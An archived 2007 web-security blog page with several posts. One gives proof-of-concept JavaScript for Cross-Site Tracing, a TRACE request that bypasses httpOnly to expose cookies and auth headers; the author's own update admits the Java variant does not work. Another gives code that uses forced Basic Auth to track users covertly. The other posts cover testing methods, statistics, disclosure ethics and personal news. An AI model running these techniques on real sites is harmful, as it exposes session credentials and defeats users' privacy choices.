Monday, April 30, 2007

XST sorta Lives! (Bypassing httpOnly)

Update 2: Amit Klein wrote in to remind me that you technically still can issue TRACE requests using XHR in IE6 SP2. By prepending some white space before the method it'll bypass the restriction (see below). I had forgotten about this little gem and would have thought MS would have fixed it long ago. Guess not or maybe they have. Either way I couldn't locate it. I also haven't done a lot of testing with IE7's XHR implementation (native right?), perhaps the same or other things can be found in there as well that could prove useful.

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("\r\nTRACE","/",false);
x.setRequestHeader("Max-Forwards","0");
x.send();
alert(x.responseText);

Update
1: Jordan and Wladimir Palant noticed it right away! (Wladimir) "Wait, last time I checked Java wasn’t making HTTP requests through the browser. That means that neither cookies nor HTTP basic authorization will be visible in the response - only what you put in there yourself. Did that change?"

Apparently I made a very large oversight in my research. Wladimir and Jordan are absolutely right! Java handles the entire HTTP connection outside of the browser and hence does not send the cookies, headers, or anything else. So that data doesn't come back to be captured. Big mistake on my part. Can't believe I missed that! Very sorry. But I have another thought that I have to double check on....


Back in late 2002 Microsoft implemented the httpOnly cookie flag in Internet Explorer as a way to prevent XSS cookie theft by denying JavaScript from reading document.cookie. A couple of months later I authored a paper describing an attack I called Cross-Site Tracing (XST), or XSS++ if you prefer, as a bypass httpOnly (plus added some other good stuff). XST works by taking control of a victims web browser and forcing it to send an HTTP TRACE (method) to the target web server, typically via XmlHTTPRequest (XHR). Web servers supporting TRACE respond by placing the all data received in the HTTP request (request line, headers, post data) into the response body. Here’s an example of a simple TRACE request exchange:

> telnet foo.com 80
Trying 127.0.0.1...

Connected to foo.bar.

Escape character is ‘^]’.

TRACE / HTTP/1.1

Host: foo.bar

X-Header: test

Cookie: param=1


HTTP/1.1 200 OK

Server: Apache

Content-Type: message/http


TRACE / HTTP/1.1

Host: foo.bar

X-Header: test

Cookie: param=1


Because the cookie becomes part of the response body, and not only found within document.cookie, JavaScript can access the data despite being tagged with httpOnly. As an additional benefit of XST, attackers can gain access to Basic, Digest, and NTLM Auth credentials located in HTTP request headers and typically out of reach of JavaScript.
Simple. In response, all major web browser updated XHR to block the use of TRACE. Flash did the same. In years since I figured XST was dead on anything but an older browser, that is until late last week.

I was experimenting with some JavaScript calling Java APIs to perform Socket calls and then it hit me. If JavaScript and Flash can’t issue TRACE requests, maybe Java could. Turns out I was right, JavaScript can direct Java to issue TRACE requests out of the browser, but my PoC implementation was slow. With help from friendly neighborhood Java guru, Anurag Agarwal, we got some nice bookmarklet PoCs up and running. I’ll let Anurag take you through the code.

Please be mindful that the code is unstable and your results may vary due to browser support.

Approach 1 (Traditional Approach using earlier versions of jdk)

//Get the url on the browser’s address bar
var l = document.location;

//Get the host name.
var host =l.host.toString();

//Set the port to 80. We can also determine the port from the location bar
var port = 80;

//Get the domain name of the host…check again
var addr = new java.net.InetAddress.getByName(host);

//Create a client socket to the server on the specified hostname and port
var socket = new java.net.Socket(addr,port);

//Open an output stream to send the request data to the server.
var wr = new java.io.BufferedWriter(newjava.io.OutputStreamWriter(socket.getOutputStream(),"UTF8"));

//Open an input stream to read the response data from the server.
var rd = new java.io.BufferedReader(new java.io.InputStreamReader(socket.getInputStream()));

//Send a trace request to the server.
wr.write("TRACE / HTTP/1.1 \n");
wr.write("Host: " + host + "\n");
wr.write("\n\r");

//Flush the output stream so that there is no data left in the buffer.
wr.flush();

//Read the response from the server until the readLine returns null which means the response is completed.
var lines = "";
while ((str = rd.readLine()) != null)
{ lines += str + "\n"; }
alert(lines);

//Close the input and output stream
wr.close();
rd.close();

//Close the socket
Socket.close();

In the traditional way (like the approach mentioned above), you'd now ask for the socket's input and/or output streams. The newer approach is using Channels. This approach is available with jdk1.4 or newer. With a channel you write directly to the channel itself. Rather than writing byte arrays, you read and write ByteBuffer objects. By default, this will read at least one byte or return -1 to indicate the end of the data, exactly as an InputStream does. It will often read more bytes if more bytes are available to be read.

Approach 2

var l = document.location;
var host =l.host.toString();
var port = 80;
var addr = new java.net.InetAddress.getByName(host);

//Create a SocketChannel
var client = java.nio.channels.SocketChannel.open(new java.net.InetSocketAddress(host, port));

//Create a java string object so that it can be converted to byte array.
var line = "TRACE / HTTP/1.1 \nHost: " + host + "\n\r\n";
var s1 = new java.lang.String(line);

//Send the data to the server.
client.write(java.nio.ByteBuffer.wrap(s1.getBytes()));

//Allocate a buffer to read the data from the server.
var buffer = java.nio.ByteBuffer.allocate(8000);

//Read the data from the server. If the data is more then the allocated bytes then this probably is not the best way. Use a different approach
client.read(buffer);

alert(new java.lang.String(buffer.array()));

Wednesday, April 25, 2007

Battle of the Colored Boxes (part 1 of 2)

Black, White, and Gray Box software testing methodologies, everyone has a preference. People frequently claim one method is best because another is “limited”. For myself that’s like saying a fork is better than a spoon (at what exactly?). The fact is if a perfect methodology for software testing existed, we’d have bug free code, but of course we don’t. Each has its strengths, which are often the weaknesses of others. This means the various methodologies are often complimentary to each other, not substitutes. The best thing to do is understand what they are good and not so good to select the one most appropriate for the task.

Lets look at Black, White, and Gray Box software testing from a high-level as it relates to a website security standpoint and highlight their strong points. I realize that not everyone will agree with my conclusions. So as always, feel free to comment and let me know if anything has been overlooked and should be considered. Also for perspective I’m of the opinion that all three methodologies require tools (scanners) and experienced personnel as part of the process. No exceptions.

Black Box (Dynamic Analysis)
Wikipedia: “Dynamic code analysis is the analysis of computer software that is performed with executing programs built from that software on a real or virtual processor”.

An attacker starting off with zero knowledge any application source code, system access, documentation or anything a typical user wouldn't have access to. This is normally an attacker with a web browser, proxy, and perhaps some fault injection tools at their disposal.

Black Box’ing:
  1. Measures the amount of effort required for an attacker to compromise the data on a website. This measurement takes into consideration additional layers of defense (web servers, WAFs, permissions, configs, proxies, etc.). This enables website owners to focus on areas that directly improve security.
  2. Allows faster business logic testing by leveraging actual operational context. Testers are able to uncover flaws (Information Leakage, Insufficient Authorization, Insufficient Authentication, etc.) that may otherwise not be visible (or significantly harder to find) by analyzing vast amounts of source code.
  3. Is generally considered to be faster, more repeatable, and less expensive than White Box’ing. This is helpful to development environments where websites are updated more than a few times per year and as a result requires constant security (re)-assurance.
  4. Provides coverage for common vulnerabilities that are not present in the code, such as Predictable Resource Location and Information Leakage. Files containing sensitive information (payment logs, backups, debug messages, source code, etc.) routinely become unlinked, orphaned, and forgotten.

White Box (Static Analysis)
Wikipedia: “Static code analysis is the analysis of computer software that is performed without actually executing programs built from that software. In most cases the analysis is performed on some version of the source code and in the other cases some form of the object code.”

An attacker with access to design document, source code, and other internal system information.

White Box’ing:
  1. Generally considered to a be a deeper method of software testing as it can touch more of the code that may be very difficult or impossible to access from the outside. Vulnerabilities such as SQL Injection, backdoors, buffer overflows, and privacy violations become easier to identify and determine if an exploit will work.
  2. Can be employed much earlier in the software development lifecycle (SDLC) because Black Box’ing requires that websites and applications are at least somewhat operational. Libraries and APIs can be tested early and independently of the rest of the system.
  3. Is capable of recommending secure coding best-practices and pinpoint the exact file or line number of vulnerabilities. While a website might be “vulnerability free” from an external perspective, bad design decisions may cause a precarious security posture. Weak use of encryption, insufficient logging, and insecure data storage are examples of issues that often prove problematic.
  4. Has an easier time understanding if identified vulnerabilities are of a one-off developer mistakes or architectural problems across the entire application infrastructure. This insight in useful when strategizing security decisions such as training or standardizing on software frameworks and APIs or both.

Gray Box or Glass Box
The combination of both Black and White Box methodologies. The spork of software testing if you will. This approach takes all the capabilities of both and reduces their respective drawbacks. The goal is to make the whole (process) worth more than the sum of its parts. In many ways Gray Box’ing achieves this so no need to go back over the above material. The largest negative issue is the increased cost in time, skill, repeatability, and overall expense of the process. Qualified people proficient in either Black or White Box’ing are hard to find and retain. Locating someone who is solid at both is extremely rare and as a result they can demand high bill rates. And of course they need double the tools so double the cost.

Top 10 Most Famous Hackers of All Time

ITSecurity has a thing for linkbait "top-lists". Normally I try to remain immune, but hey, who can blame them for trying right? This time I figured I'd help them out since I've actually had the opportunity to meet a few of the "Top 10 Most Famous Hackers of All Time". Interesting individuals and they're always much different in person than the mental image of their persona I created in my mind. Often these guys show up at Defcon or BlackHat and usually willing to exchange a story for a beer. Good times.

Monday, April 23, 2007

XSS Attacks book

"XSS is the New Buffer Overflow, JavaScript Malware is the New Shell Code"

At long last, we put the finishing touches on our new book (XSS Attacks), the cover art, and sample chapter (including ToC). It’ll be sent to the printers May 5 and shipped a few days after. Woohoo!

I’ve written two book forewords in the past, but this is my first experience as an author so I’m really excited about the release. Only a couple years ago the idea of an entire book dedicated to XSS would have been crazy. Today the general feeling is that there’s FINALLY going to be one available. Especially for me who must explain the finer points daily.

In writing this book, the shock to me was how much there is about XSS to cover. In fact there was so much data we had to cut back a significant amount, otherwise we’d have to write two books. What this also means is that the content found within the pages is high quality and densely packed. Great for people just getting up to speed on XSS and a solid reference for those who desire a deeper understanding of the attack technique specifics currently scattered all over.

I also wanted to give major kudos to the other authors who made this possible RSnake, Anton Rager, and especially Seth Fogie and pdp (architect), who really went above and beyond. You guys rocked. And thank you to Andrew Williams (Managing Editor, Syngress Publishing), a publisher I’d highly recommend to anyone and hope to work with again in the future. Writing a technical book is hard, really hard, and there is no substitute for a good team.

Friday, April 20, 2007

Tracking users with Basic Auth

Update: Amit Klein, being the very thorough expert that he is, pointed out that method #2 below has previously been used in the wild. And that #3 might not actually work in IE, RSnake was experiencing some strange caching issue he and Amit are working our the details on.

Thanks to RSnake for helping me test this one. Some users configure their web browsers to block cookies entirely or least for certain websites (like banner providers). They’re attempting to protect their privacy, imagine that. Anyway, there seems to be a way to track users with Basic Auth instead of cookies. Here’s a walk through of the concept:

1) User visits a websiteA where they are blocking its cookies.

2) websiteA delivers a web page with some JavaScript code that silently forces the browser to Basic Auth to the web server with a specific username and password. Think of the u/p as nothing more than a session ID as the web server will authenticate anything sent.

Depending on the browser, either of these methods below could work and will cache the u/p.

Firefox Only
<* img src="http://session:ID@website/">

or

Firefox or Internet Explorer

function forceBasic Authentication() {
var req = null;
var req = new XMLHttpRequest();
if (!req) { req = new ActiveXObject("Msxml2.XMLHTTP"); }
if (!req) { req = new ActiveXObject("Microsoft.XMLHTTP");}
req.open('GET', 'http://website/', false, 'Session', ‘ID’);
req.send(null);
}

Internet Explorer Only

function forceBasic Authentication() {
var req = null;
var req = new XMLHttpRequest();
if (!req) { req = new ActiveXObject("Msxml2.XMLHTTP"); }
if (!req) { req = new ActiveXObject("Microsoft.XMLHTTP");}
req.open('GET', 'http://website/', false);
req.setRequestHeader("Authorization", "Basic nQzw==");
req.send(null);
}

3) Once the browser is authenticated, after receiving a 401, the browser will cache the u/p and send it with each subsequent HTTP request. The benefit of this method is that there is no way to block Basic Auth forced in this way and the user receives no standard Basic Auth pop-up.

Thursday, April 19, 2007

Here come the statistics!

Finally, hard data is being made available so we don’t have to speak in pure theoretical terms anymore about the importance of our work. We’ve been waiting to get to this point in the industry for years. I’ve been talking about the need for statistics on “how websites can be broken into” and also “how are they attacked or compromised”. This is importance stuff to have at the ready. So today I was very happy to have the opportunity to host a popular webinar (slides) and release our in-depth Web Application Security Risk Report (reg req.). Mind the marketing-fu:

“Through our flagship service, WhiteHat Sentinel, we perform rigorous and ongoing vulnerability assessments on hundreds of (public-facing) production and development websites each month. Our work gives us a one-of-a-kind perspective into website vulnerability trends across financial, e-commerce, healthcare and high-tech industries. WhiteHat Security can accurately identify which issues are currently the most prevalent and severe. As the only company with access to this depth of cumulative data, we are sharing our findings to provide enterprises with a clearer picture of the vulnerability management issues affecting their websites. This quarter’s report represents a more than three-fold sample increase over the last, and is based on data obtained between January 1, 2006 and March 31, 2007. “

Then just last week the Web Application Security Statistics Project, which we contributed along with three other companies, released a combined set of data. Sure there were a few gripes about the value of the data, but this is just a starting point for progress and people recognize that. Over time, the data will become larger and more representative. Good stuff for the community at large. Get involved if you can.

“This initial round of statistics was compiled from data provided by four vendors - Whitehat Security, SPI Dynamics, Positive Technologies and Cenzic. We would like to thank all of the initial contributors for their participation. Our goal is to have the project grow over time with data from an increasing number of sources as this will improve the overall quality of the data. Statistical biases will be lessened as more entities contribute to the initiative so we would encourage those vendors engaged in web application scanning work to contact us if they are interested in participating in the project.“

And also, The Web Hacking Incidents Database has been updated at long last, which is an excellent resource to research news stories relevant to web application security.

“The web hacking incident database (WHID) is a Web Application Security Consortium project dedicated to maintaining a list of web applications related security incidents. The database is unique in tracking only media reported security incidents that can be associated with a web application security vulnerability. We also try to limit the database to targeted attacks only.”

Out of our hands

Everyone is figuring out that Web-based applications are the future of software with Software as a Service (SaaS) as the delivery model of choice. Businesses are migrating to Salesforce.com. Google Apps launched in full force to disrupt Microsoft Office dominance. And who knows how many businesses are been made possible using eBay’s marketplace. The advantages and cost savings of Web-based applications and SaaS are just too good to ignore despite how much sensitive data is being uploaded.

Even us everyday users are taking advantage of easy-to-use Web applications. Online banking, when is the last time you went to your local branch? Heck, even they host their web apps. Taxes, tens of millions filed online this year. They host too. Hundreds of millions use Web mail, instead of or in combination with Desktop email applications. When it comes down to it, it’s hard to know who really has your data anyway, maybe a dozen or more companies. What this also means for security practitioners is that the rules and business requirements have changed dramatically yet again.

Lack of Control
Any information users upload or create (email, documents, spreadsheets, marketing information, etc) is now publicly accessible. (Google Calendar) The data resides publicly available 24/7/365 on someone else's web servers, not on your private local network, and the security is beyond your immediate control. How much do you trust or understand the security practices of the hosting company? You can’t make your data secure even if you want to.

Escalating Risk
While various web-based systems will start off small in terms of users (also like Salesforce.com), they are relatively unattractive targets for the bad guys. However, as they increase in popularity with millions of user registrations, more bad guys will target them for the potential pay off. MySpace is a good example of this and data they store no one would really consider sensitive. Think of other financial or information oriented systems with millions of users, those are the REALLY attractive targets.

Incident Response
Should a breach occur, how would you know? Would the company be legally obligated to tell them? Under what circumstances? (Turbo Tax) What is their backup and disaster recovery policy? Are you our of business during that time? These are serious business security and continuity issues should organizations rely upon these services for day to day operations. Downtime costs could be huge.


Anyway, I wish I had more in the way of immediate solutions beyond testing the security yourself. But that is probably not legal and they are unlikely going to hand over written consent. As more breaches occur, we’ll figure out the answers.

Sunday, April 15, 2007

How I got my start

I’ve told this story from time to time when asked, but never written about it. The inspiration to do so came from posts by Security Catalyst and Andrew Hay. Computers have been a part of my life for nearly 20 years, starting with a Commodore 64 when I was ~10, a few x286s and x386s, then a Power Macintosh 6100 my mother bought for me when I was 16. Coded a lot in between, but that’s ancient history and a story you’ve probably heard a hundred times. So let’s skip to where it gets interesting. And to borrow on line from Great Expectations: “I'm not going to tell the story the way it happened. I'm going to tell it the way I remember it.”

As a late teenager I left Maui for California to attend college, find a decent job, and seek out greater opportunity. I enrolled in a trade school for electronics engineering. At the same time my couple years of web development and Unix experience was enough to land me a job as an entry-level Unix Administrator for Amgen (a large bio-tech company). I got to work on mega-big Sun (Solaris) servers as part of a team responsible for backups, disaster recovery, and web-enabling day-to-day operation. Amgen was very wealthy, treated their employees exceedingly well, and threw lots of posh parties. Most of which I couldn’t attend because they served beer & wine and I wasn’t yet of age. Funny eh. Being only 19 or 20, this was a kickass job, learned a lot, and loved it.

Then in the autumn of 99’ something strange happened. A slew of well-publicized articles hit the Web saying someone found vulnerabilities in many of the major websites like Yahoo!, Amazon, and eBay. As a result they were “insecure”. I knew making a secure website was exceeding hard, and as far as I was concerned, impossible. So being a naive youngster, I couldn’t figure out why this was newsworthy and thought everyone already knew! What happened next was even more interesting. Weeks later the same companies issued statements that they had fixed the issues and were now completely “secure”. Amazing, naïveté kicking in, how did they do this!?!? I had to know!

After work I registered a few shiny new Yahoo! Mail accounts, and thought to myself – “how hard could this possibly be (to break into my own accounts)?” I don’t remember the actual vulnerability, but it took only a few minutes to find. Probably had something to do with an XSS / JavaScript filter-evasion or meta-character injection. Wrote up a simple minded advisory and sent it anonymously to the only internal Yahoo! corp email address I could find (specific address withheld). The message explained what the issue was, said I didn’t want any credit or press, and to let me know if they had any questions. Had my fun for the evening figuring that was the end of that.

The next morning I checked the account and lo’ and behold someone responded! Wow, Yahoo! is talking to ME! During those days there was no company bigger or more exciting than Internet darling Yahoo! The email read thank you for letting us know about the issue, we have a couple of questions, appreciate you wanting to remain anonymous, but we’d like to send you a t-shirt. WHOA HO! Not only was I able to find a vulnerability in Yahoo!, but it was important enough that they’re asking about it and want to supply me with clothing. Cool. They also said to let them know if you find anything else. Sweet, an open invitation.

Over the next week or two I’m finding bugs, reporting them, and having a casual dialog with somebody at Yahoo!. I mentioned to a co-worker what was going on and they were excited about it as well. They asked whom I was communicating with, but hadn’t thought to check. I forwarded one of the emails so they could see. They facetiously told me to have a look for myself. I took the name from the email address (withheld), and I kid you not, it was from David Filo, one of the two Yahoo! founders and so-called Chief Yahoo!. OMG! Here I am some dumb kid with a few web app vulns and I’m having an informal nonchalant conversation with a billionaire. BTW, Filo is a very cool guy and if you ever met him, he’s an amazingly smart engineer without an ounce of arrogance or superiority complex that one might expect.

A few days later a Yahoo recruiter emailed and asked if I’d like to fly up to Silicon Valley for an interview. Stunned is the word that best describes my reaction. I made sure they knew that I had no formal education or security experience to speak of. It didn’t bother them, so it didn’t bother me. At their purple and yellow laced offices, they grilled me on all sorts of technology questions for 6 hours, most of which I didn’t know. C’mon, this was Yahoo, how could I? Figuring I had no shot at all I promptly flew home. I heard back a couple days later via FedEx. YES! An offer letter from Yahoo! OMG, look at the salary! COOL, job description was nothing but security! NO WAY, stock options! YES! Wait, what the heck are those?

I took the prized yellow piece of paper to my school counselor and asked her a very simple question, “What’s the top student out of here expect to make at their next job?” Begrudgingly she told me and it was nowhere near what my offer letter said. Then asked if she had any GOOD reason why I should say. The only answer I recall was that you’ll never go back and finish your degree (she was right of course). And just like that I was gone and on my way. Took a month off back on Maui, hiding out from Y2K, then started my new life in January of 2000.

I became part of Yahoo! Engineering and felt completely out of my league around the real super brains of Web technology. My job was simple. Identify as many security vulnerabilities as possible, formulate solutions, and chase down developers to resolve them. Talk about awesome with my new "hacker yahoo" job title. It took about 6 months to get my arms around web application security and how big and important this job actually was. The scope was roughly 180 million users and 17,000 publicly facing web servers. 12+ hour days were the norm. On a system that massive, IDSs say only 1 thing that matters, everyone is attacking you with everything they got all the time. Unscientifically we thought about 1% of our user-base was malicious, a similar number we heard from our industry peers. Yes, 1.8 million bad guys.

I performed what seemed like a never-ending supply of web application security assessments. It was rare for a website to be completely free of security issues. To streamline the workload I developed an assessment methodology consisting of a few thousand security tests averaging 40 hours to complete per website. The eminent domain was over 600+ websites, enterprise-wide, in a dozen or so languages from english-to-french-to-korean. The way the math worked out assessing the security of every website would have taken over 11 years (24,000 total hours/ 2080 working hours per year) to complete if nothing ever changed. Yah, right.

Obviously we needed to reduce workload because few experts existed and we certainly weren’t going to hire a dedicated team of 10. Seeking help I talked to every expert I could find and experimented with early commercial scanners and web application firewall solutions. None of what I saw was going to solve our problem. Almost two years in what I did see was opportunity. Yahoo! was certainly not the only one in the e-commerce business or grappling with too much work, too few experts, and a lack of decent tools. I felt I could do better, which ultimately led to my founding of WhiteHat Security.

Well, that’s how I got my start. And the last 6 years have only gotten more interesting.

Friday, April 13, 2007

mainstream media is figuring out the industries new disclosure dilemma

Bug hunters face online apps dilemma (via Joris Evers from CNET)
"Security holes in online applications may go unfixed because well-intended hackers are afraid to report bugs. Web applications pose a dilemma for bug hunters: how to test the security without going to jail? If hackers probe traditional software such as Windows or Word, they can do so on their own PCs. That isn't true for Web applications, which run on servers operated by others. Testing the security there is likely illegal and could lead to prosecution."

We've all debating the legal and ethical issues, but it doesn't change the fact that we're going to lose the canary-in-the coal-mine aspect of information security. Does that mean we're going to have to rely on compliance rather than community peer review? Eeesh!

I also just caught Alan Shimel's follow-up on the article, he comments on one of my quotes:

"Jeremiah Grossman of White Hat Security (and a past guest on our podcast) is quoted as saying that: "We're losing the Good Samaritan aspect of security". He uses the gun law analogy that if we make it illegal to find vulnerabilities in web sites, only bad guys will find them. Sort of like if it is illegal to own guns, than only bad guys will own guns. I disagree with the gun analogy and I disagree with Jeremiah on this one. I just think there is too much room for abuse to allow condone people hacking into web sites. Who really knows what their motives are."

Let me clarify because I still stand by the statement as what will inevitably happen should Good Samaritans be routinely prosecuted. But, I don't think Alan and I fundamentally disagree on the next step of the legal matters. Pen-testing websites without consent is and should be illegal (we can debate proper penalties later). There is just too much risk otherwise. What we do have is a catch-22 situation.


Tuesday, April 10, 2007

WASC Meet-Up (Sunnyvale, Ca.) April 18, 2007 @ 6pm

Normally we hold WASC Meet-Ups during large conferences (RSA 2007/BlackHat) where a lot of web application security people are at same place at the same time. Around the S.F. Bay Area there's enough webappsec people that we we no longer need that excuse. So we're planning a WASC Meet-Up inviting those in the local community to drop by. It'll be an informal event, maybe 15-30 people, no presentations or sponsors. Just like minded people sharing food, drinks, and interesting conversation. Simply an opportunity to see people that we only otherwise communicate with virtually. Everyone is welcome and please drop me a note if you plan on coming.

Oh, one last thing: Everyone is encouraged to buy a beer for some one they didn't previously know.

Time: Wed, April. 18 @ 6:00pm

Place:
The Faultline (Sunnyvale)
http://www.faultlinebrewing.com/

1235 Oakmead Parkway
Sunnyvale, California, 94086
Tel:408/736-2739

See you all there!

Jeremiah Grossman
contact@webappsec.org

Friday, April 06, 2007

Vulnerability Assessment, When do we stop looking?

This is a fair and increasingly common question in web application security. Especially considering that we never know how many bugs (or vulnerabilities) actually exist in a piece of code. This is also why I tend to approach security as an attempt to make a system as hard as possible (not impossible, because that’s impossible) for the “bad guys” to break-in. Finding and fixing vulnerabilities, whether pre-deployment or post-production, makes the next vulnerability harder to identify. The idea is to require the bad guys to expend more resources (time, money, etc.) than it’ll be worth should they succeed. Realistically though given a long enough timeline, everyone gets hacked, if they haven’t been so already. Which begs the question, when do we stop looking for vulnerabilities?

The answer varies depending on the importance of each website and the security needs of the organization. Beyond the everyday network noise, in my experience the average attacker targeting custom web applications uses a web browser, an HTTP proxy, Google, and perhaps some specially crafted scripts. I think the at this layer odds are the attackers aren’t using vulnerability scanners of either the open source (because no decent ones exist) or commercial variety (it’s faster for them to find the vulnerability or two they need by hand). The main variable in a bad guys success is their level of persistence and cognitive skill rather than the capability of the tools. This is an important benchmark to understand.

The way the logic works is the more thorough and frequent the VA process, the fewer attackers there are in the world possessing the time/ability to penetrate the system. Depth of testing needs to outpace what is perceived to be the skill of the vast majority of bad guys. Otherwise what’s the point? There are the causal researcher types who just want see if they can find an XSS issue on domain X. Then there are the more dedicated and skilled attackers willing invest several weeks or months to defraud a system who are a level above. Frequency of VA should also match the change rate of the application. For example web applications that change every week doesn’t match up well with an annual two-week engagement.

At some point VA reaches a level of diminishing returns and after thousands of assessments we have a good idea of best practices and what due diligence represents. We understand security can never be 100% and at some point mistakes will be made, bad guys get lucky, or they’re talented and VERY persistent. I created the following diagrams to illustrate these concepts. The diagrams are not meant to be a literal measures but to visually describe the fundamental concepts.

Time/Difficulty vs. Total Vulnerability (%)
Now if we overlay the estimated effectiveness of certain solutions in the same vulnerability coverage zone of certain adversaries.

Effectiveness/Skill vs. Persistence
When do we stop looking?

As a biased VA vendor it’ll sound self-serving (but so be it): On websites where the code changes more than a few times per year which require at least a modest degree of security, you never stop looking because the bad guys certainly won’t. Applications are changing and the attack techniques are improving even if the applications aren’t. You want to enlist those who are AT LEAST as skilled as the pool of attackers, have a thorough methodology, and a consistent process. To borrow a quote from Bruce:

“Security is a process, not a product.”

False-negatives, oh how I hate thee

At WhiteHat we launch thousands (sometimes millions and everything in between) of customized attacks on our customers’ websites in an effort to find any and hopefully all vulnerabilities before the bad guys exploit them. After performing vulnerability assessments (VA) on hundreds of websites each week your team becomes extremely experienced and proficient at the process while uncovering bucket loads of issues. Experience, consistency, and efficiency are key in webappsec VA. The one thing that’s always on my mind though is the ever-present risk of missed vulnerabilities. So-called false-negatives. What does anyone (enterprise or vendor) do about those?

Just like developers and bugs, assessors are human who make mistakes and inevitably business logic flaws will get missed. Scanning technology is imperfect and will fail to find technical vulnerabilities (XSS, SQL Injection, etc.). Or even certain links for that matter. This is an issue but not the core problem. The real issue is there’s no way to know for sure how many vulnerabilities are actually in a real-live production website. Meaning, there’s no real way for any vulnerability assessment solutions to measure proactively against the true vulnerability total because it’s unknown. (please don’t tell me canned web applications because that’s not the same thing) We can only measure against the next best solution (bake-off) or the next best bad guy (incident). The results generated are simply not the same or as GOOD as compared to the true vulnerability total, which would be more ideal.

Tuesday, April 03, 2007

odd pictures from my travels

These guys take security seriously. First "I think" the word "woman" should be "women" and why exactly would pregnant women have to worried about being run through this thing? Not to mention the person with a pacemaker.


Why an xmas tree made of small red teddy bears of course.

The other thing I learned working at Yahoo!

Seemed strange to run into the bathroom and hangout with a bunch of other guys during a tornado.

Destroyer of hard drives

Entrance to the NYSE. Nothing really strange here, move along.

Video Interview with Help Net Security

During RSA 2006, Mirko Zorz and Berislav Kucan (the guys behind Help Net Security and my personal favorite infosec magazine (IN)SECURE) invited me to record a video. "Web Application Security with Jeremiah Grossman", what else would I be talking about? :)

Description: "Jeremiah Grossman is the CTO of WhiteHat Security. In this video he talks about the differences between web application security and network security, the assessment process in general, logical vunerabilties as well as Web 2.0 security developments. He also provides us with insight on his work as a security officer at Yahoo! and the reason why he started WhiteHat Security."

This was a lot of fun and a great use of the medium. I've only done a couple of these video interviews in the past and *whew*, they do make ya a little nervous. This should be done a lot more often at conferences in my opinion. Help Net, going to Black Hat USA?

I also noticed Help Net posted several other interesting looking infosec videos to YouTube as well. Good stuff!

Monday, April 02, 2007

Digg buttons with smarts!

Andrew "Drew" Hintz put the CSS History Hack to good use. He made a JavaScript include that only shows the "Digg" button to users who have actually been to Digg.com. No need to show it to other users who aren't familiar with the website. I tried it out and works perfect and it even has configuration options. Way cool. Nice work Drew!

OWASP, San Jose, and PCI (April 12)

I regularly attend local OWASP Chapter here in San Jose. Always good to mingle with the webappsec crowd and share some high-end conversation. Some amazingly smart people around with solid insights. Also a big plus if you learn something from the presenters of course. :)

In this particular case, I'm really interested in hearing what Bernie Weidel, the PCI guy, from Qualys has to say. He's going to cover the real deal as it relates to webappsec and the standard. I got to talking with Bernie last week and I learned a great deal from him that I hadn't heard anywhere else. There are a lot of blind spots in their and he's in a position to know the guts of what going on. If your in the area, stop by and say HI!

Thursday, April 12, 2007
Ariba
807 11th Avenue
Sunnyvale, Ca 94089

Agenda and Presentations:
6:00pm - 6:30pm ... Check-in and reception (food & bev)
6:30pm - 7:30pm ... Past, Present and Future of Web Application Security in PCI - Bernie Weidel
7:30pm - 8:30pm ... Top Web Application Vulnerabilities, Exploits and Countermeasures - Josh Daymont

JavaScript Hijacking

Update: Robert Lemos (SecurityFocus) followed up as well, "Developers warned to secure AJAX design"

Update
: Joris Evers from C-Net blogged the story.

Brian Chess (Chief Scientist) from Fortify recently invited me to peer review an interesting new white paper entitled “JavaScript Hijacking” prior to its release. Private peer review is something I do with some regularity to help people out and in return I get to see what others are working on ahead of time. Its cool exchange! Plus this work extends some of my earlier research into JavaScript object overwriting (Gmail example) so I have the background for it. Specifically as a result of an AJAX-enabled website, when sensitive data is returned as a JavaScript object thats susceptible to CSRF attacks.

The paper digs into the various AJAX development frameworks, how they defend against CSRF attacks, or don’t, possible solutions, risks, advice etc. Brian Chess, Yekaterina Tsipenyuk O'Neil, Jacob West did an good job researching this, consulted with the experts, and presented the technical bits in an easy to understand fashion. For those already up to speed on the bleeding-edge web attacks, you’re not going to find anything “new”. This is more for developer and organizations that want something simple to understand what’s going on and what they can do about it. Good stuff.

A Brazialian Jiu Jitsu Week

Update: Added a few pics below.

I've been a lot busier than normal the last week in preparation for a pair of Brazilian Jiu Jitsu (BJJ) tournaments. I took a few days off, let email/blog lapsed a bit, and visited a couple of cool BJJ/MMA academies in the L.A. area. I met some really famous fighters along the way as well. Rorion Gracie, Rener Gracie, Travis Lutter, Valid Ismael, etc.

Anyway, last weekend I entered a relatively small tournament in the blue belt unlimited (221.5+ lbs) division. This is where the monsters go to play. Now I’m 6’2” / 270lbs, not small by any measure, so I figured I’d be OK. Also I’m fairly inexperienced as compared to most blues in the competition who are 3-4 years in and I’m only a year. I like to compete just the same. To my utter astonishment, I was significantly outsized, being the small one of the bunch. I kid you not. The guy who beat me was about 320 lbs. I’m not used to being outweighed by 50lbs! And the guy who won was 343lbs. I couldn’t see the fight from my vantage point, face smashed into the mat, but I’m told I help my own fairly well. I could have won at a certain point, but didn’t capitalize. Ugh. A loss is a loss.

So this weekend I entered a really BIG tournament in the same division. Again, I was the small guy but more prepared and less butterflies. Another guy there was 6’6”, 310 lbs, and well built. Whoa. In my fight I was fairly evenly matched size wise, but I couldn’t take this guy off his feat. He was REALLY strong and my takedowns suck. He scored a takedown on me half way through, but I’m pretty good about getting back up quickly. No extra points. I didn’t get submitted, which is something to be proud of I guess, but again a loss is a loss.

I’ve never been one to get discourage, but its certainly frustrating. My tourney record (0-3) is pathetic and frankly I'm getting sick of getting my butt kicked. Both experience pointed out exactly what I have to do moving forward in my training. No better way to test your skills than to throw yourself into the fire.

1) Time to get out of this weight division. Taking the next 6-9 months to get below 221 and not compete until. This will make me a lot faster as well.

2) Work A LOT on take-downs.

3) Work on my technique and build a lot more stamina. This is key.

We’ll see how the next year goes.

Travis Lutter (UFC Fighter)

The view from the crowd

The view of a match from ground level